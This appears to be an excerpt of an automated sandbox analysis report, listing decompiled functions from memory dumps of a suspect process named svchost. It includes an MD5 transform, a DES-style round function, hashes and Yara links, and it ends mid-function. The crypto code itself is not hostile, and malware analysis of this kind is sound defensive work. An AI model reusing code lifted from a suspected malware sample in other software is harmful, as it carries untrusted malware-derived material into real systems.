                                                                                                                                        • Opcode ID: 93f21967da1c6853c22785ba6aada72162c4e91a03ed299abcbcffd8d68c65c9
                                                                                                                                        • Instruction ID: 6b6b841ac1df837fb916598550c31d23815af00400e63fb35a7ce2afb2bde07a
                                                                                                                                        • Opcode Fuzzy Hash: 93f21967da1c6853c22785ba6aada72162c4e91a03ed299abcbcffd8d68c65c9
                                                                                                                                        • Instruction Fuzzy Hash: F9113A75A00208EBEF01CF94CC85BDEBBB4FB04390F118065F925662E5CB74AA44DB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        Function 1000301A, Relevance: .5, Instructions: 529COMMONCrypto
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                        			E1000301A(void* __eax, intOrPtr* _a4, intOrPtr* _a8, char _a12) {
				char _v8;
				signed int _t211;
				signed int _t214;
				signed int _t217;
				signed int _t220;
				signed int _t223;
				signed int _t226;
				signed int _t229;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed int _t250;
				signed int _t253;
				signed int _t256;
				signed int _t257;
				signed int _t260;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t272;
				signed int _t275;
				signed int _t278;
				signed int _t281;
				signed int _t284;
				signed int _t287;
				signed int _t290;
				signed int _t293;
				signed int _t296;
				signed int _t299;
				signed int _t302;
				signed int _t306;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t318;
				signed int _t321;
				signed int _t324;
				signed int _t327;
				signed int _t330;
				signed int _t333;
				signed int _t336;
				signed int _t339;
				signed int _t342;
				signed int _t345;
				signed int _t348;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t358;
				signed int _t361;
				signed int _t364;
				signed int _t367;
				signed int _t370;
				signed int _t373;
				signed int _t376;
				signed int _t379;
				signed int _t382;
				signed int _t385;
				signed int _t388;
				signed int _t391;
				signed int _t394;
				signed int _t397;
				signed int _t400;
				signed int _t403;
				intOrPtr* _t404;
				intOrPtr* _t645;

				_t645 = _a8;
				_t404 = _a4;
				_v8 = _a12;
				do {
					_t257 =  *(_t404 + 4);
					_t306 =  *(_t404 + 8);
					_t355 =  *(_t404 + 0xc);
					asm("rol eax, 0x7");
					_t211 = ((_t306 ^ _t355) & _t257 ^ _t355) +  *_t404 - 0x28955b88 +  *_t645 + _t257;
					asm("rol edx, 0xc");
					_t358 = ((_t257 ^ _t306) & _t211 ^ _t306) + _t355 - 0x173848aa +  *((intOrPtr*)(_t645 + 4)) + _t211;
					asm("rol ecx, 0x11");
					_t309 = ((_t211 ^ _t257) & _t358 ^ _t257) + _t306 + 0x242070db +  *((intOrPtr*)(_t645 + 8)) + _t358;
					asm("rol ebx, 0x16");
					_t260 = ((_t358 ^ _t211) & _t309 ^ _t211) + _t257 - 0x3e423112 +  *((intOrPtr*)(_t645 + 0xc)) + _t309;
					asm("rol eax, 0x7");
					_t214 = ((_t309 ^ _t358) & _t260 ^ _t358) + _t211 - 0xa83f051 +  *((intOrPtr*)(_t645 + 0x10)) + _t260;
					asm("rol edx, 0xc");
					_t361 = ((_t260 ^ _t309) & _t214 ^ _t309) + _t358 + 0x4787c62a +  *((intOrPtr*)(_t645 + 0x14)) + _t214;
					asm("rol ecx, 0x11");
					_t312 = ((_t214 ^ _t260) & _t361 ^ _t260) + _t309 - 0x57cfb9ed +  *((intOrPtr*)(_t645 + 0x18)) + _t361;
					asm("rol ebx, 0x16");
					_t263 = ((_t361 ^ _t214) & _t312 ^ _t214) + _t260 - 0x2b96aff +  *((intOrPtr*)(_t645 + 0x1c)) + _t312;
					asm("rol eax, 0x7");
					_t217 = ((_t312 ^ _t361) & _t263 ^ _t361) + _t214 + 0x698098d8 +  *((intOrPtr*)(_t645 + 0x20)) + _t263;
					asm("rol edx, 0xc");
					_t364 = ((_t263 ^ _t312) & _t217 ^ _t312) + _t361 - 0x74bb0851 +  *((intOrPtr*)(_t645 + 0x24)) + _t217;
					asm("rol ecx, 0x11");
					_t315 = ((_t217 ^ _t263) & _t364 ^ _t263) + _t312 - 0xa44f +  *((intOrPtr*)(_t645 + 0x28)) + _t364;
					asm("rol ebx, 0x16");
					_t266 = ((_t364 ^ _t217) & _t315 ^ _t217) + _t263 - 0x76a32842 +  *((intOrPtr*)(_t645 + 0x2c)) + _t315;
					asm("rol eax, 0x7");
					_t220 = ((_t315 ^ _t364) & _t266 ^ _t364) + _t217 + 0x6b901122 +  *((intOrPtr*)(_t645 + 0x30)) + _t266;
					asm("rol edx, 0xc");
					_t367 = ((_t266 ^ _t315) & _t220 ^ _t315) + _t364 - 0x2678e6d +  *((intOrPtr*)(_t645 + 0x34)) + _t220;
					asm("rol ecx, 0x11");
					_t318 = ((_t220 ^ _t266) & _t367 ^ _t266) + _t315 - 0x5986bc72 +  *((intOrPtr*)(_t645 + 0x38)) + _t367;
					asm("rol ebx, 0x16");
					_t269 = ((_t367 ^ _t220) & _t318 ^ _t220) + _t266 + 0x49b40821 +  *((intOrPtr*)(_t645 + 0x3c)) + _t318;
					asm("rol eax, 0x5");
					_t223 = ((_t318 ^ _t269) & _t367 ^ _t318) + _t220 - 0x9e1da9e +  *((intOrPtr*)(_t645 + 4)) + _t269;
					asm("rol edx, 0x9");
					_t370 = ((_t269 ^ _t223) & _t318 ^ _t269) + _t367 - 0x3fbf4cc0 +  *((intOrPtr*)(_t645 + 0x18)) + _t223;
					asm("rol ecx, 0xe");
					_t321 = ((_t223 ^ _t370) & _t269 ^ _t223) + _t318 + 0x265e5a51 +  *((intOrPtr*)(_t645 + 0x2c)) + _t370;
					asm("rol ebx, 0x14");
					_t272 = ((_t370 ^ _t321) & _t223 ^ _t370) + _t269 - 0x16493856 +  *_t645 + _t321;
					asm("rol eax, 0x5");
					_t226 = ((_t321 ^ _t272) & _t370 ^ _t321) + _t223 - 0x29d0efa3 +  *((intOrPtr*)(_t645 + 0x14)) + _t272;
					asm("rol edx, 0x9");
					_t373 = ((_t272 ^ _t226) & _t321 ^ _t272) + _t370 + 0x2441453 +  *((intOrPtr*)(_t645 + 0x28)) + _t226;
					asm("rol ecx, 0xe");
					_t324 = ((_t226 ^ _t373) & _t272 ^ _t226) + _t321 - 0x275e197f +  *((intOrPtr*)(_t645 + 0x3c)) + _t373;
					asm("rol ebx, 0x14");
					_t275 = ((_t373 ^ _t324) & _t226 ^ _t373) + _t272 - 0x182c0438 +  *((intOrPtr*)(_t645 + 0x10)) + _t324;
					asm("rol eax, 0x5");
					_t229 = ((_t324 ^ _t275) & _t373 ^ _t324) + _t226 + 0x21e1cde6 +  *((intOrPtr*)(_t645 + 0x24)) + _t275;
					asm("rol edx, 0x9");
					_t376 = ((_t275 ^ _t229) & _t324 ^ _t275) + _t373 - 0x3cc8f82a +  *((intOrPtr*)(_t645 + 0x38)) + _t229;
					asm("rol ecx, 0xe");
					_t327 = ((_t229 ^ _t376) & _t275 ^ _t229) + _t324 - 0xb2af279 +  *((intOrPtr*)(_t645 + 0xc)) + _t376;
					asm("rol ebx, 0x14");
					_t278 = ((_t376 ^ _t327) & _t229 ^ _t376) + _t275 + 0x455a14ed +  *((intOrPtr*)(_t645 + 0x20)) + _t327;
					asm("rol eax, 0x5");
					_t232 = ((_t327 ^ _t278) & _t376 ^ _t327) + _t229 - 0x561c16fb +  *((intOrPtr*)(_t645 + 0x34)) + _t278;
					asm("rol edx, 0x9");
					_t379 = ((_t278 ^ _t232) & _t327 ^ _t278) + _t376 - 0x3105c08 +  *((intOrPtr*)(_t645 + 8)) + _t232;
					asm("rol ecx, 0xe");
					_t330 = ((_t232 ^ _t379) & _t278 ^ _t232) + _t327 + 0x676f02d9 +  *((intOrPtr*)(_t645 + 0x1c)) + _t379;
					asm("rol ebx, 0x14");
					_t281 = ((_t379 ^ _t330) & _t232 ^ _t379) + _t278 - 0x72d5b376 +  *((intOrPtr*)(_t645 + 0x30)) + _t330;
					asm("rol eax, 0x4");
					_t235 = (_t330 ^ _t379 ^ _t281) + _t232 - 0x5c6be +  *((intOrPtr*)(_t645 + 0x14)) + _t281;
					asm("rol edx, 0xb");
					_t382 = (_t281 ^ _t330 ^ _t235) + _t379 - 0x788e097f +  *((intOrPtr*)(_t645 + 0x20)) + _t235;
					asm("rol ecx, 0x10");
					_t333 = (_t235 ^ _t281 ^ _t382) + _t330 + 0x6d9d6122 +  *((intOrPtr*)(_t645 + 0x2c)) + _t382;
					asm("rol ebx, 0x17");
					_t284 = (_t382 ^ _t235 ^ _t333) + _t281 - 0x21ac7f4 +  *((intOrPtr*)(_t645 + 0x38)) + _t333;
					asm("rol eax, 0x4");
					_t238 = (_t333 ^ _t382 ^ _t284) + _t235 - 0x5b4115bc +  *((intOrPtr*)(_t645 + 4)) + _t284;
					asm("rol edx, 0xb");
					_t385 = (_t284 ^ _t333 ^ _t238) + _t382 + 0x4bdecfa9 +  *((intOrPtr*)(_t645 + 0x10)) + _t238;
					asm("rol ecx, 0x10");
					_t336 = (_t238 ^ _t284 ^ _t385) + _t333 - 0x944b4a0 +  *((intOrPtr*)(_t645 + 0x1c)) + _t385;
					asm("rol ebx, 0x17");
					_t287 = (_t385 ^ _t238 ^ _t336) + _t284 - 0x41404390 +  *((intOrPtr*)(_t645 + 0x28)) + _t336;
					asm("rol eax, 0x4");
					_t241 = (_t336 ^ _t385 ^ _t287) + _t238 + 0x289b7ec6 +  *((intOrPtr*)(_t645 + 0x34)) + _t287;
					asm("rol edx, 0xb");
					_t388 = (_t287 ^ _t336 ^ _t241) + _t385 - 0x155ed806 +  *_t645 + _t241;
					asm("rol ecx, 0x10");
					_t339 = (_t241 ^ _t287 ^ _t388) + _t336 - 0x2b10cf7b +  *((intOrPtr*)(_t645 + 0xc)) + _t388;
					asm("rol ebx, 0x17");
					_t290 = (_t388 ^ _t241 ^ _t339) + _t287 + 0x4881d05 +  *((intOrPtr*)(_t645 + 0x18)) + _t339;
					asm("rol eax, 0x4");
					_t244 = (_t339 ^ _t388 ^ _t290) + _t241 - 0x262b2fc7 +  *((intOrPtr*)(_t645 + 0x24)) + _t290;
					asm("rol edx, 0xb");
					_t391 = (_t290 ^ _t339 ^ _t244) + _t388 - 0x1924661b +  *((intOrPtr*)(_t645 + 0x30)) + _t244;
					asm("rol ecx, 0x10");
					_t342 = (_t244 ^ _t290 ^ _t391) + _t339 + 0x1fa27cf8 +  *((intOrPtr*)(_t645 + 0x3c)) + _t391;
					asm("rol ebx, 0x17");
					_t293 = (_t391 ^ _t244 ^ _t342) + _t290 - 0x3b53a99b +  *((intOrPtr*)(_t645 + 8)) + _t342;
					_t150 = _t244 - 0xbd6ddbc; // 0xf4292243
					asm("rol eax, 0x6");
					_t247 = ((0xffffffff ^ _t391 | _t293) ^ _t342) + _t150 +  *_t645 + _t293;
					_t152 = _t391 + 0x432aff97; // 0x1432aff96
					asm("rol edx, 0xa");
					_t394 = ((0xffffffff ^ _t342 | _t247) ^ _t293) + _t152 +  *((intOrPtr*)(_t645 + 0x1c)) + _t247;
					_t155 = _t342 - 0x546bdc59; // 0xab9423a6
					asm("rol ecx, 0xf");
					_t345 = ((0xffffffff ^ _t293 | _t394) ^ _t247) + _t155 +  *((intOrPtr*)(_t645 + 0x38)) + _t394;
					_t158 = _t293 - 0x36c5fc7; // 0xfc93a038
					asm("rol ebx, 0x15");
					_t296 = ((0xffffffff ^ _t247 | _t345) ^ _t394) + _t158 +  *((intOrPtr*)(_t645 + 0x14)) + _t345;
					_t161 = _t247 + 0x655b59c3; // 0x1655b59c2
					asm("rol eax, 0x6");
					_t250 = ((0xffffffff ^ _t394 | _t296) ^ _t345) + _t161 +  *((intOrPtr*)(_t645 + 0x30)) + _t296;
					_t164 = _t394 - 0x70f3336e; // 0x8f0ccc91
					asm("rol edx, 0xa");
					_t397 = ((0xffffffff ^ _t345 | _t250) ^ _t296) + _t164 +  *((intOrPtr*)(_t645 + 0xc)) + _t250;
					_t167 = _t345 - 0x100b83; // 0xffeff47c
					asm("rol ecx, 0xf");
					_t348 = ((0xffffffff ^ _t296 | _t397) ^ _t250) + _t167 +  *((intOrPtr*)(_t645 + 0x28)) + _t397;
					_t170 = _t296 - 0x7a7ba22f; // 0x85845dd0
					asm("rol ebx, 0x15");
					_t299 = ((0xffffffff ^ _t250 | _t348) ^ _t397) + _t170 +  *((intOrPtr*)(_t645 + 4)) + _t348;
					_t173 = _t250 + 0x6fa87e4f; // 0x16fa87e4e
					asm("rol eax, 0x6");
					_t253 = ((0xffffffff ^ _t397 | _t299) ^ _t348) + _t173 +  *((intOrPtr*)(_t645 + 0x20)) + _t299;
					_t176 = _t397 - 0x1d31920; // 0xfe2ce6df
					asm("rol edx, 0xa");
					_t400 = ((0xffffffff ^ _t348 | _t253) ^ _t299) + _t176 +  *((intOrPtr*)(_t645 + 0x3c)) + _t253;
					_t179 = _t348 - 0x5cfebcec; // 0xa3014313
					asm("rol ecx, 0xf");
					_t351 = ((0xffffffff ^ _t299 | _t400) ^ _t253) + _t179 +  *((intOrPtr*)(_t645 + 0x18)) + _t400;
					_t182 = _t299 + 0x4e0811a1; // 0x14e0811a0
					asm("rol ebx, 0x15");
					_t302 = ((0xffffffff ^ _t253 | _t351) ^ _t400) + _t182 +  *((intOrPtr*)(_t645 + 0x34)) + _t351;
					_t185 = _t253 - 0x8ac817e; // 0xf7537e81
					asm("rol eax, 0x6");
					_t256 = ((0xffffffff ^ _t400 | _t302) ^ _t351) + _t185 +  *((intOrPtr*)(_t645 + 0x10)) + _t302;
					_t188 = _t400 - 0x42c50dcb; // 0xbd3af234
					asm("rol edx, 0xa");
					_t403 = ((0xffffffff ^ _t351 | _t256) ^ _t302) + _t188 +  *((intOrPtr*)(_t645 + 0x2c)) + _t256;
					_t191 = _t351 + 0x2ad7d2bb; // 0x12ad7d2ba
					asm("rol ecx, 0xf");
					_t354 = ((0xffffffff ^ _t302 | _t403) ^ _t256) + _t191 +  *((intOrPtr*)(_t645 + 8)) + _t403;
					_t194 = _t302 - 0x14792c6f; // 0xeb86d390
					asm("rol ebx, 0x15");
					_t404 = _a4;
					 *_t404 =  *_t404 + _t256;
					 *(_t404 + 4) =  *(_t404 + 4) + ((0xffffffff ^ _t256 | _t354) ^ _t403) + _t194 +  *((intOrPtr*)(_t645 + 0x24)) + _t354;
					 *(_t404 + 8) =  *(_t404 + 8) + _t354;
					 *(_t404 + 0xc) =  *(_t404 + 0xc) + _t403;
					_t203 =  &_v8;
					 *_t203 = _v8 - 1;
					_t645 = _t645 + 0x40;
				} while ( *_t203 >= 0);
				return _t256;
			}








































































                                                                                                                                        0x10003026
                                                                                                                                        0x10003029
                                                                                                                                        0x1000302f
                                                                                                                                        0x10003032
                                                                                                                                        0x10003034
                                                                                                                                        0x10003037
                                                                                                                                        0x1000303a
                                                                                                                                        0x1000304e
                                                                                                                                        0x10003051
                                                                                                                                        0x10003065
                                                                                                                                        0x10003068
                                                                                                                                        0x1000307c
                                                                                                                                        0x1000307f
                                                                                                                                        0x10003093
                                                                                                                                        0x10003096
                                                                                                                                        0x100030aa
                                                                                                                                        0x100030ad
                                                                                                                                        0x100030c1
                                                                                                                                        0x100030c4
                                                                                                                                        0x100030d8
                                                                                                                                        0x100030db
                                                                                                                                        0x100030ef
                                                                                                                                        0x100030f2
                                                                                                                                        0x10003106
                                                                                                                                        0x10003109
                                                                                                                                        0x1000311d
                                                                                                                                        0x10003120
                                                                                                                                        0x10003134
                                                                                                                                        0x10003137
                                                                                                                                        0x1000314b
                                                                                                                                        0x1000314e
                                                                                                                                        0x10003162
                                                                                                                                        0x10003165
                                                                                                                                        0x10003179
                                                                                                                                        0x1000317c
                                                                                                                                        0x10003190
                                                                                                                                        0x10003193
                                                                                                                                        0x100031a7
                                                                                                                                        0x100031aa
                                                                                                                                        0x100031be
                                                                                                                                        0x100031c1
                                                                                                                                        0x100031d5
                                                                                                                                        0x100031d8
                                                                                                                                        0x100031ec
                                                                                                                                        0x100031ef
                                                                                                                                        0x10003202
                                                                                                                                        0x10003205
                                                                                                                                        0x10003219
                                                                                                                                        0x1000321c
                                                                                                                                        0x10003230
                                                                                                                                        0x10003233
                                                                                                                                        0x10003247
                                                                                                                                        0x1000324a
                                                                                                                                        0x1000325e
                                                                                                                                        0x10003261
                                                                                                                                        0x10003275
                                                                                                                                        0x10003278
                                                                                                                                        0x1000328c
                                                                                                                                        0x1000328f
                                                                                                                                        0x100032a3
                                                                                                                                        0x100032a6
                                                                                                                                        0x100032ba
                                                                                                                                        0x100032bd
                                                                                                                                        0x100032d1
                                                                                                                                        0x100032d4
                                                                                                                                        0x100032e8
                                                                                                                                        0x100032eb
                                                                                                                                        0x100032ff
                                                                                                                                        0x10003302
                                                                                                                                        0x10003316
                                                                                                                                        0x10003319
                                                                                                                                        0x1000332b
                                                                                                                                        0x1000332e
                                                                                                                                        0x10003340
                                                                                                                                        0x10003343
                                                                                                                                        0x10003355
                                                                                                                                        0x10003358
                                                                                                                                        0x1000336a
                                                                                                                                        0x1000336d
                                                                                                                                        0x1000337f
                                                                                                                                        0x10003382
                                                                                                                                        0x10003394
                                                                                                                                        0x10003397
                                                                                                                                        0x100033a9
                                                                                                                                        0x100033ac
                                                                                                                                        0x100033be
                                                                                                                                        0x100033c1
                                                                                                                                        0x100033d3
                                                                                                                                        0x100033d6
                                                                                                                                        0x100033e7
                                                                                                                                        0x100033ea
                                                                                                                                        0x100033fc
                                                                                                                                        0x100033ff
                                                                                                                                        0x10003411
                                                                                                                                        0x10003414
                                                                                                                                        0x10003426
                                                                                                                                        0x10003429
                                                                                                                                        0x1000343b
                                                                                                                                        0x1000343e
                                                                                                                                        0x10003450
                                                                                                                                        0x10003453
                                                                                                                                        0x10003465
                                                                                                                                        0x10003468
                                                                                                                                        0x10003475
                                                                                                                                        0x1000347e
                                                                                                                                        0x10003481
                                                                                                                                        0x1000348e
                                                                                                                                        0x10003498
                                                                                                                                        0x1000349b
                                                                                                                                        0x100034a8
                                                                                                                                        0x100034b2
                                                                                                                                        0x100034b5
                                                                                                                                        0x100034c2
                                                                                                                                        0x100034cc
                                                                                                                                        0x100034cf
                                                                                                                                        0x100034dc
                                                                                                                                        0x100034e6
                                                                                                                                        0x100034e9
                                                                                                                                        0x100034f6
                                                                                                                                        0x10003500
                                                                                                                                        0x10003503
                                                                                                                                        0x10003510
                                                                                                                                        0x1000351a
                                                                                                                                        0x1000351d
                                                                                                                                        0x1000352a
                                                                                                                                        0x10003534
                                                                                                                                        0x10003537
                                                                                                                                        0x10003544
                                                                                                                                        0x1000354e
                                                                                                                                        0x10003551
                                                                                                                                        0x1000355e
                                                                                                                                        0x10003568
                                                                                                                                        0x1000356b
                                                                                                                                        0x10003578
                                                                                                                                        0x10003582
                                                                                                                                        0x10003585
                                                                                                                                        0x10003592
                                                                                                                                        0x1000359c
                                                                                                                                        0x1000359f
                                                                                                                                        0x100035ac
                                                                                                                                        0x100035b6
                                                                                                                                        0x100035b9
                                                                                                                                        0x100035c6
                                                                                                                                        0x100035d0
                                                                                                                                        0x100035d3
                                                                                                                                        0x100035e0
                                                                                                                                        0x100035ea
                                                                                                                                        0x100035ed
                                                                                                                                        0x100035fa
                                                                                                                                        0x10003604
                                                                                                                                        0x10003609
                                                                                                                                        0x1000360c
                                                                                                                                        0x1000360e
                                                                                                                                        0x10003611
                                                                                                                                        0x10003614
                                                                                                                                        0x10003617
                                                                                                                                        0x10003617
                                                                                                                                        0x1000361a
                                                                                                                                        0x1000361a
                                                                                                                                        0x1000362a

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                                                                                                                        • Instruction ID: 87772c69faaf583724149594d3153b37e2a39dedebadf45f128ff790bfb95947
                                                                                                                                        • Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                                                                                                                        • Instruction Fuzzy Hash: 89121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Function 1000D46A, Relevance: .2, Instructions: 224COMMONCrypto
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000D46A(void* __eax, signed int* _a4, signed int* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int* _t39;
				signed int* _t40;
				signed int* _t41;
				signed int* _t42;
				signed int* _t68;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t112;
				unsigned int _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;

				_t39 = _a8;
				_t121 =  *_a4;
				_t106 = _a4[1];
				_t73 = (_t121 >> 0x00000004 ^ _t106) & 0x0f0f0f0f;
				_t107 = _t106 ^ _t73;
				_t122 = _t121 ^ _t73 << 0x00000004;
				_t75 = (_t122 >> 0x00000010 ^ _t107) & 0x0000ffff;
				_t108 = _t107 ^ _t75;
				_t123 = _t122 ^ _t75 << 0x00000010;
				_t77 = (_t108 >> 0x00000002 ^ _t123) & 0x33333333;
				_t124 = _t123 ^ _t77;
				_t109 = _t108 ^ _t77 << 0x00000002;
				_t79 = (_t109 >> 0x00000008 ^ _t124) & 0x00ff00ff;
				_t125 = _t124 ^ _t79;
				_t112 = (_t109 ^ _t79 << 0x00000008) + (_t109 ^ _t79 << 0x00000008) | (_t109 ^ _t79 << 0x00000008) >> 0x0000001f & 0x00000001;
				_t81 = (_t125 ^ _t112) & 0xaaaaaaaa;
				_t113 = _t112 ^ _t81;
				_t128 = (_t125 ^ _t81) + (_t125 ^ _t81) | (_t125 ^ _t81) >> 0x0000001f & 0x00000001;
				_v8 = 8;
				do {
					_t40 =  &(_t39[1]);
					_v12 =  *(0x10011c88 + (((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) & 0x0000003f) * 4) |  *((((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) >> 0x00000006 & 0x000000fc) + 0x10011a88) |  *((((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) >> 0x0000000e & 0x000000fc) + 0x10011888) |  *((((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) >> 0x00000016 & 0x000000fc) + 0x10011688);
					_t41 =  &(_t40[1]);
					_t128 = _t128 ^ ( *(0x10011d88 + ((_t113 ^  *_t40) & 0x0000003f) * 4) | _v12 |  *(((_t113 ^  *_t40) >> 0x00000006 & 0x000000fc) + 0x10011b88) |  *(((_t113 ^  *_t40) >> 0x0000000e & 0x000000fc) + 0x10011988) |  *(((_t113 ^  *_t40) >> 0x00000016 & 0x000000fc) + 0x10011788));
					_t42 =  &(_t41[1]);
					_v12 =  *(0x10011c88 + (((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) & 0x0000003f) * 4) |  *((((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) >> 0x00000006 & 0x000000fc) + 0x10011a88) |  *((((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) >> 0x0000000e & 0x000000fc) + 0x10011888) |  *((((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) >> 0x00000016 & 0x000000fc) + 0x10011688);
					_t39 =  &(_t42[1]);
					_t113 = _t113 ^ ( *(0x10011d88 + ((_t128 ^  *_t42) & 0x0000003f) * 4) | _v12 |  *(((_t128 ^  *_t42) >> 0x00000006 & 0x000000fc) + 0x10011b88) |  *(((_t128 ^  *_t42) >> 0x0000000e & 0x000000fc) + 0x10011988) |  *(((_t128 ^  *_t42) >> 0x00000016 & 0x000000fc) + 0x10011788));
					_v8 = _v8 - 1;
				} while (_v8 != 0);
				_t115 = _t113 << 0x0000001f | _t113 >> 0x00000001;
				_t93 = (_t128 ^ _t115) & 0xaaaaaaaa;
				_t116 = _t115 ^ _t93;
				_t131 = (_t128 ^ _t93) << 0x0000001f | (_t128 ^ _t93) >> 0x00000001;
				_t95 = (_t131 >> 0x00000008 ^ _t116) & 0x00ff00ff;
				_t117 = _t116 ^ _t95;
				_t132 = _t131 ^ _t95 << 0x00000008;
				_t97 = (_t132 >> 0x00000002 ^ _t117) & 0x33333333;
				_t118 = _t117 ^ _t97;
				_t133 = _t132 ^ _t97 << 0x00000002;
				_t99 = (_t118 >> 0x00000010 ^ _t133) & 0x0000ffff;
				_t134 = _t133 ^ _t99;
				_t119 = _t118 ^ _t99 << 0x00000010;
				_t101 = (_t119 >> 0x00000004 ^ _t134) & 0x0f0f0f0f;
				 *_a4 = _t101 << 0x00000004 ^ _t119;
				_t68 = _a4;
				_t68[1] = _t134 ^ _t101;
				return _t68;
			}









































                                                                                                                                        0x1000d472
                                                                                                                                        0x1000d478
                                                                                                                                        0x1000d47d
                                                                                                                                        0x1000d487
                                                                                                                                        0x1000d48d
                                                                                                                                        0x1000d494
                                                                                                                                        0x1000d49f
                                                                                                                                        0x1000d4a5
                                                                                                                                        0x1000d4ac
                                                                                                                                        0x1000d4b7
                                                                                                                                        0x1000d4bd
                                                                                                                                        0x1000d4c4
                                                                                                                                        0x1000d4cf
                                                                                                                                        0x1000d4d5
                                                                                                                                        0x1000d4eb
                                                                                                                                        0x1000d4f3
                                                                                                                                        0x1000d4fb
                                                                                                                                        0x1000d50a
                                                                                                                                        0x1000d50c
                                                                                                                                        0x1000d513
                                                                                                                                        0x1000d523
                                                                                                                                        0x1000d567
                                                                                                                                        0x1000d56c
                                                                                                                                        0x1000d5b5
                                                                                                                                        0x1000d5c7
                                                                                                                                        0x1000d60b
                                                                                                                                        0x1000d610
                                                                                                                                        0x1000d659
                                                                                                                                        0x1000d65b
                                                                                                                                        0x1000d65e
                                                                                                                                        0x1000d673
                                                                                                                                        0x1000d67b
                                                                                                                                        0x1000d683
                                                                                                                                        0x1000d690
                                                                                                                                        0x1000d69b
                                                                                                                                        0x1000d6a1
                                                                                                                                        0x1000d6a8
                                                                                                                                        0x1000d6b3
                                                                                                                                        0x1000d6b9
                                                                                                                                        0x1000d6c0
                                                                                                                                        0x1000d6cb
                                                                                                                                        0x1000d6d1
                                                                                                                                        0x1000d6d8
                                                                                                                                        0x1000d6e3
                                                                                                                                        0x1000d6f3
                                                                                                                                        0x1000d6f5
                                                                                                                                        0x1000d6f8
                                                                                                                                        0x1000d701

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e1df6c7488eebae5d475b4fc4d045cb470c92537486541aeb35f73e01c95e60d
                                                                                                                                        • Instruction ID: 2a3a59f7a4ab1595d84f0d06739809a477139a948796cae1d0435f603c943839
                                                                                                                                        • Opcode Fuzzy Hash: e1df6c7488eebae5d475b4fc4d045cb470c92537486541aeb35f73e01c95e60d
                                                                                                                                        • Instruction Fuzzy Hash: 4961B037F516364BE75C8EAA9C81155E692ABC8320B5F827DCE09F7381C9B4FD5286C0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Function 02442B50, Relevance: .0, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2fad537a8198f7557bf06baeca17a023b996e97923a2d2ef9918eaa794762a2c
                                                                                                                                        • Instruction ID: 1dd41cb7f6162bd084e35b68c4fe481a0ed87936269b80ebfc0e558275d70ebd
                                                                                                                                        • Opcode Fuzzy Hash: 2fad537a8198f7557bf06baeca17a023b996e97923a2d2ef9918eaa794762a2c
                                                                                                                                        • Instruction Fuzzy Hash: 4DD06C31221895CFC781DF29D080E81B3E4EB08724B0684D2E805CFA22D274FD41CB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Function 10006D74, Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E10006D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
